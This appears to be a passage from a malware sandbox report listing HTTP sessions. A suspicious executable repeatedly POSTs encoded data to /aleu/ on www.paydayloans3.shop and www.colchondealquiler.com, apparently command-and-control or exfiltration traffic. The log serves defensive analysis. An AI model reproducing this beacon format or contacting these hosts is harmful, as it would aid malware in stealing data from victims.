                                                                                                                                                                          Data Raw: 4d 7a 59 44 6b 6c 66 3d 75 56 74 50 54 6a 69 4f 39 6b 59 30 4a 72 62 59 4c 70 74 65 4c 56 6b 63 69 46 55 64 65 54 43 57 66 6e 5a 72 71 72 70 32 34 4e 74 30 66 54 46 47 4e 4c 66 55 64 32 6e 57 4a 56 73 59 37 4c 56 6d 53 59 33 67 32 41 57 4a 33 52 39 2b 45 6e 39 36 50 34 48 4c 77 42 33 4c 32 67 58 70 32 71 48 48 76 70 57 49 6b 52 55 59 51 45 51 70 70 47 2b 42 2f 51 73 47 70 37 79 30 46 57 77 4d 64 4b 68 34 45 2b 50 2b 6a 50 53 36 45 43 66 6c 4c 43 6f 45 35 2b 54 41 47 74 59 65 42 75 35 37 62 79 38 43 59 70 64 43 64 74 48 32 55 41 6a 41 78 6e 44 6c 48 2b 61 42 61 71 75 2f 79 6f 30 67 75 53 59 34 59 57 67 39 49 41 4b 46 32 66 54 78 62 43 38 75 31 67 3d 3d
                                                                                                                                                                          Data Ascii: MzYDklf=uVtPTjiO9kY0JrbYLpteLVkciFUdeTCWfnZrqrp24Nt0fTFGNLfUd2nWJVsY7LVmSY3g2AWJ3R9+En96P4HLwB3L2gXp2qHHvpWIkRUYQEQppG+B/QsGp7y0FWwMdKh4E+P+jPS6ECflLCoE5+TAGtYeBu57by8CYpdCdtH2UAjAxnDlH+aBaqu/yo0guSY4YWg9IAKF2fTxbC8u1g==
                                                                                                                                                                          Apr 26, 2024 07:42:02.447021008 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                                                                                          date: Fri, 26 Apr 2024 05:42:02 GMT
                                                                                                                                                                          content-type: text/html
                                                                                                                                                                          content-length: 556
                                                                                                                                                                          server: NginX
                                                                                                                                                                          connection: close
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          2192.168.2.74972864.190.62.22802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:42:05.181227922 CEST785OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.paydayloans3.shop
                                                                                                                                                                          Origin: http://www.paydayloans3.shop
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 240
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.paydayloans3.shop/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Raw: 4d 7a 59 44 6b 6c 66 3d 75 56 74 50 54 6a 69 4f 39 6b 59 30 62 36 72 59 4a 4b 56 65 48 6c 6b 66 76 56 55 64 49 6a 43 61 66 6e 6c 72 71 75 5a 6d 34 37 64 30 63 33 42 47 4d 4b 66 55 63 32 6e 57 42 31 74 53 6b 62 56 74 53 59 36 64 32 43 79 4a 33 53 42 2b 45 6c 6c 36 4f 4c 76 4d 78 52 33 7a 39 41 58 52 79 71 48 48 76 70 57 49 6b 52 41 2b 51 45 49 70 70 57 75 42 39 79 49 46 33 72 79 7a 41 6d 77 4d 5a 4b 68 38 45 2b 50 63 6a 4b 4b 63 45 41 6e 6c 4c 48 73 45 35 76 54 44 50 74 59 59 66 65 35 73 64 48 46 33 42 59 70 41 51 64 2f 79 65 68 4c 66 35 78 65 48 64 63 57 74 45 37 57 45 32 71 51 57 35 30 46 4e 61 58 6b 6c 46 69 2b 6b 70 6f 32 62 57 51 64 71 6a 63 55 30 71 53 61 35 65 48 6c 6a 2f 6d 57 46 76 71 54 61 56 6f 6b 3d
                                                                                                                                                                          Data Ascii: MzYDklf=uVtPTjiO9kY0b6rYJKVeHlkfvVUdIjCafnlrquZm47d0c3BGMKfUc2nWB1tSkbVtSY6d2CyJ3SB+Ell6OLvMxR3z9AXRyqHHvpWIkRA+QEIppWuB9yIF3ryzAmwMZKh8E+PcjKKcEAnlLHsE5vTDPtYYfe5sdHF3BYpAQd/yehLf5xeHdcWtE7WE2qQW50FNaXklFi+kpo2bWQdqjcU0qSa5eHlj/mWFvqTaVok=
                                                                                                                                                                          Apr 26, 2024 07:42:05.425362110 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                                                                                          date: Fri, 26 Apr 2024 05:42:05 GMT
                                                                                                                                                                          content-type: text/html
                                                                                                                                                                          content-length: 556
                                                                                                                                                                          server: NginX
                                                                                                                                                                          connection: close
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          3192.168.2.74972964.190.62.22802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:42:07.952651024 CEST1798OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.paydayloans3.shop
                                                                                                                                                                          Origin: http://www.paydayloans3.shop
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 1252
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.paydayloans3.shop/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Raw: 4d 7a 59 44 6b 6c 66 3d 75 56 74 50 54 6a 69 4f 39 6b 59 30 62 36 72 59 4a 4b 56 65 48 6c 6b 66 76 56 55 64 49 6a 43 61 66 6e 6c 72 71 75 5a 6d 34 37 56 30 66 43 56 47 4e 70 33 55 4e 47 6e 57 64 6c 74 66 6b 62 56 77 53 63 65 52 32 43 2b 5a 33 55 46 2b 57 51 35 36 4a 36 76 4d 34 52 33 7a 79 67 58 71 32 71 48 65 76 70 47 55 6b 52 51 2b 51 45 49 70 70 55 47 42 35 67 73 46 31 72 79 30 46 57 77 4c 64 4b 68 45 45 2b 57 68 6a 4f 57 54 45 77 48 6c 4c 6e 38 45 31 39 4c 44 58 39 59 61 65 65 34 70 64 48 42 65 42 59 30 2f 51 64 4c 59 65 67 2f 66 76 51 37 69 42 66 75 71 52 39 47 5a 36 72 6b 56 34 47 31 76 57 58 77 69 61 41 71 2b 73 2f 79 31 59 53 56 31 72 5a 56 78 39 54 75 51 53 56 78 4e 37 79 75 4e 30 72 4c 2f 43 75 6a 58 34 44 77 52 59 75 71 6a 4c 36 76 67 72 36 57 71 38 45 45 4e 4a 71 45 4a 42 51 35 63 67 67 2b 7a 37 6a 74 36 39 54 53 49 66 70 6e 34 77 63 69 44 64 6c 4f 4f 66 34 42 68 70 38 72 68 71 58 61 4f 47 38 4d 32 55 6e 6f 78 4e 6f 42 79 79 4b 57 7a 69 42 42 66 70 52 4a 38 4d 46 6a 31 56 4e 72 49 4f 79 55 70 44 64 47 76 38 59 69 63 49 49 73 30 67 69 48 58 4f 45 74 62 76 44 31 58 73 4d 42 4c 43 34 38 34 50 57 55 4f 64 77 67 66 75 4b 73 73 4d 31 4b 4a 6b 56 56 59 47 67 45 31 71 45 61 7a 2b 46 34 74 45 67 41 49 72 44 56 66 56 6a 47 34 6a 50 43 4b 7a 4c 79 7a 69 41 71 62 58 56 57 4b 72 35 41 59 30 6c 6e 71 45 35 69 35 6f 4a 6b 76 4c 50 6d 5a 59 51 44 56 75 66 63 49 35 4a 2b 4b 50 72 74 52 58 4c 79 61 49 38 34 6c 69 4f 5a 32 63 67 35 41 54 49 77 75 43 45 31 78 6d 6a 32 43 2b 4f 69 45 46 61 56 4a 47 6c 6d 34 6f 36 49 71 65 4d 41 5a 45 38 43 42 4b 43 6b 66 79 4b 66 4b 34 44 69 6f 49 70 79 65 51 47 4e 79 78 53 63 6b 45 6f 6c 57 47 79 47 6e 4e 57 39 45 43 79 69 4b 61 72 7a 72 77 6e 6c 4c 71 68 64 69 6b 55 65 37 6c 37 63 37 31 47 49 74 66 48 73 39 45 78 39 5a 4b 67 36 48 77 35 2f 34 4f 79 68 75 58 50 37 38 39 50 6b 6d 70 66 77 4c 33 67 58 47 33 50 39 53 57 31 59 58 37 2b 63 59 4a 7a 6f 36 62 73 57 58 78 58 71 61 59 45 44 55 71 42 38 4c 2b 39 42 6a 45 37 34 33 4d 71 7a 6e 46 47 58 4a 38 6d 53 47 78 34 2b 77 34 78 41 34 7a 44 67 63 42 43 5a 2f 65 42 46 52 47 33 6c 35 6a 52 6b 47 74 32 6a 62 43 79 64 7a 4a 46 50 33 57 72 57 55 71 64 72 54 6e 65 34 79 56 53 71 4f 2b 4d 64 53 77 47 38 61 52 33 5a 6f 5a 39 6d 77 45 64 47 63 6a 4d 69 74 62 66 77 38 2f 70 66 79 73 45 66 30 2b 46 4f 78 53 6d 59 4b 31 35 59 4a 43 70 2b 4a 6f 4a 72 56 62 5a 64 53 54 63 69 57 4d 6d 2b 4f 65 47 47 5a 54 30 34 37 6a 34 39 36 6f 71 38 56 69 44 69 72 6e 44 66 4b 67 31 6c 46 46 73 72 6c 72 58 42 7a 76 62 59 64 35 62 7a 42 2f 75 73 74 43 66 42 33 52 32 4f 75 70 74 33 72 6b 4a 63 4d 65 42 6e 56 4d 45 4f 54 6f 65 72 75 49 45 6b 70 62 71 6b 78 37 75 65 4b 7a 5a 4a 7a 4b 64 54 30 65 4b 36 66 2b 73 6b 4d 4f 2b 69 75 47 2b 65 63 4d 58 73 47 50 31 77 45 55 71 56 56 68 6e 50 31 46 74 50 74 6f 72 64 62 37 4a 48 63 34 37 69 5a 4f 55 6b 45 54 4a 75 36 77 47 44 34 44 75 2b 39 42 56 51 72 46 47 65 76 69 62 78 69 58 61 53 43 4f 30 45 70 70 4d 47 77 63 55 4c 58 66 49 2b 44 74 2f 33 71 4d 41 70 68 4b 59 4e 61 71 4a 43 39 54 56 2b 66 67 77 55 75 5a 6b 65 4f 53 75 44 48 59 75 2b 65 67 38 34 6b 63 43 66 4b 6e 57 42 62 70 2f 6f 56 44 66 71 2b 46 76 51 74 78 68 71 75 4b 41 6f 4d 72 57 47 53 73 31 56 63 2b 51 55 57 30 68 6b 36 4d 6f 44 39 30 7a 6f 59 63 49 45 78 59 68 65 6b 67 61 71 32 37 62 6c 61 55 61 46 6e 61 4b 2f 4e 61 30 6c 6c 52 54 78 6b 38 62 44 57 6a 6d 51 47 38 7a 56 46 36 42 56 36 36 6a 58 6d 38 38 6e 58 37 45 34 54 41 72 35 2f 51 49 34 67 67 4f 47 44 67 4c 4d 4f 53 63 35 44 37 32 49 75 6d 74 64 42 47 5a 30 52 56 4a 4b 62 66 76 31 4f 7a 37 68 30 71 32 55 50 33 67 50 35 50 6b 49 6b 45 4a 38 67 38 37 4e 48 7a 35 2f 52 46 36 79 71 66 6f 46 71 30 56 77 39 6e 36 5a 48 72 34 53 30 49 55 79 2b 66 73 44 70 30 78 32 30 73 4c 74 30 34 55 2b 48 50 4c 41 42
                                                                                                                                                                          Data Ascii: MzYDklf=uVtPTjiO9kY0b6rYJKVeHlkfvVUdIjCafnlrquZm47V0fCVGNp3UNGnWdltfkbVwSceR2C+Z3UF+WQ56J6vM4R3zygXq2qHevpGUkRQ+QEIppUGB5gsF1ry0FWwLdKhEE+WhjOWTEwHlLn8E19LDX9Yaee4pdHBeBY0/QdLYeg/fvQ7iBfuqR9GZ6rkV4G1vWXwiaAq+s/y1YSV1rZVx9TuQSVxN7yuN0rL/CujX4DwRYuqjL6vgr6Wq8EENJqEJBQ5cgg+z7jt69TSIfpn4wciDdlOOf4Bhp8rhqXaOG8M2UnoxNoByyKWziBBfpRJ8MFj1VNrIOyUpDdGv8YicIIs0giHXOEtbvD1XsMBLC484PWUOdwgfuKssM1KJkVVYGgE1qEaz+F4tEgAIrDVfVjG4jPCKzLyziAqbXVWKr5AY0lnqE5i5oJkvLPmZYQDVufcI5J+KPrtRXLyaI84liOZ2cg5ATIwuCE1xmj2C+OiEFaVJGlm4o6IqeMAZE8CBKCkfyKfK4DioIpyeQGNyxSckEolWGyGnNW9ECyiKarzrwnlLqhdikUe7l7c71GItfHs9Ex9ZKg6Hw5/4OyhuXP789PkmpfwL3gXG3P9SW1YX7+cYJzo6bsWXxXqaYEDUqB8L+9BjE743MqznFGXJ8mSGx4+w4xA4zDgcBCZ/eBFRG3l5jRkGt2jbCydzJFP3WrWUqdrTne4yVSqO+MdSwG8aR3ZoZ9mwEdGcjMitbfw8/pfysEf0+FOxSmYK15YJCp+JoJrVbZdSTciWMm+OeGGZT047j496oq8ViDirnDfKg1lFFsrlrXBzvbYd5bzB/ustCfB3R2Oupt3rkJcMeBnVMEOToeruIEkpbqkx7ueKzZJzKdT0eK6f+skMO+iuG+ecMXsGP1wEUqVVhnP1FtPtordb7JHc47iZOUkETJu6wGD4Du+9BVQrFGevibxiXaSCO0EppMGwcULXfI+Dt/3qMAphKYNaqJC9TV+fgwUuZkeOSuDHYu+eg84kcCfKnWBbp/oVDfq+FvQtxhquKAoMrWGSs1Vc+QUW0hk6MoD90zoYcIExYhekgaq27blaUaFnaK/Na0llRTxk8bDWjmQG8zVF6BV66jXm88nX7E4TAr5/QI4ggOGDgLMOSc5D72IumtdBGZ0RVJKbfv1Oz7h0q2UP3gP5PkIkEJ8g87NHz5/RF6yqfoFq0Vw9n6ZHr4S0IUy+fsDp0x20sLt04U+HPLAB
                                                                                                                                                                          Apr 26, 2024 07:42:08.195743084 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                                                                                          date: Fri, 26 Apr 2024 05:42:08 GMT
                                                                                                                                                                          content-type: text/html
                                                                                                                                                                          content-length: 556
                                                                                                                                                                          server: NginX
                                                                                                                                                                          connection: close
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          4192.168.2.74973064.190.62.22802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:42:10.721609116 CEST504OUTGET /aleu/?MzYDklf=jXFvQTK4oWsNW5HaVP0aKlBegUUeN16TTlZ8jbhw/9BHTw5yM7uncTfMOk5Q960TVKfivgiXqRpaWw5bUpeZnRruwwT6g/D0s8W22E0wG3Y43Svl+j8+gYa6G242ZIg/F531ut75LnnH&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Host: www.paydayloans3.shop
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Apr 26, 2024 07:42:10.965172052 CEST107INHTTP/1.1 436
                                                                                                                                                                          date: Fri, 26 Apr 2024 05:42:10 GMT
                                                                                                                                                                          content-length: 0
                                                                                                                                                                          server: NginX
                                                                                                                                                                          connection: close


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          5192.168.2.749731217.76.128.34802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:42:16.914031982 CEST777OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.colchondealquiler.com
                                                                                                                                                                          Origin: http://www.colchondealquiler.com
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 220
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.colchondealquiler.com/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Raw: 4d 7a 59 44 6b 6c 66 3d 73 63 4b 30 58 4e 46 79 31 35 42 4c 43 48 34 71 41 71 6e 4e 43 6b 58 33 55 35 6c 79 43 47 35 6c 32 45 4f 76 68 37 62 6a 56 53 53 41 50 47 68 77 58 76 61 51 66 52 56 45 66 46 50 54 47 78 44 66 4c 7a 7a 33 54 6a 56 6c 76 4d 34 47 6d 52 69 41 4c 31 55 6b 39 70 6e 6a 54 33 66 78 38 65 65 67 47 33 77 55 32 6c 64 55 6f 38 7a 45 53 32 58 55 47 36 70 36 58 30 42 7a 45 62 73 39 67 67 34 4c 41 56 52 39 63 42 77 4c 68 52 6f 71 37 46 49 66 44 76 35 35 39 38 31 63 49 63 48 57 35 78 56 33 36 62 56 2f 66 67 42 44 71 6c 35 57 32 42 51 61 48 41 6f 72 67 69 58 49 79 32 47 6c 37 30 2b 4b 46 56 51 72 56 4f 56 67 49 65 6d 4b 43 4a 4d 32 78 51 3d 3d
                                                                                                                                                                          Data Ascii: MzYDklf=scK0XNFy15BLCH4qAqnNCkX3U5lyCG5l2EOvh7bjVSSAPGhwXvaQfRVEfFPTGxDfLzz3TjVlvM4GmRiAL1Uk9pnjT3fx8eegG3wU2ldUo8zES2XUG6p6X0BzEbs9gg4LAVR9cBwLhRoq7FIfDv55981cIcHW5xV36bV/fgBDql5W2BQaHAorgiXIy2Gl70+KFVQrVOVgIemKCJM2xQ==
                                                                                                                                                                          Apr 26, 2024 07:42:17.174994946 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:42:17 GMT
                                                                                                                                                                          Server: Apache
                                                                                                                                                                          X-ServerIndex: llim605
                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
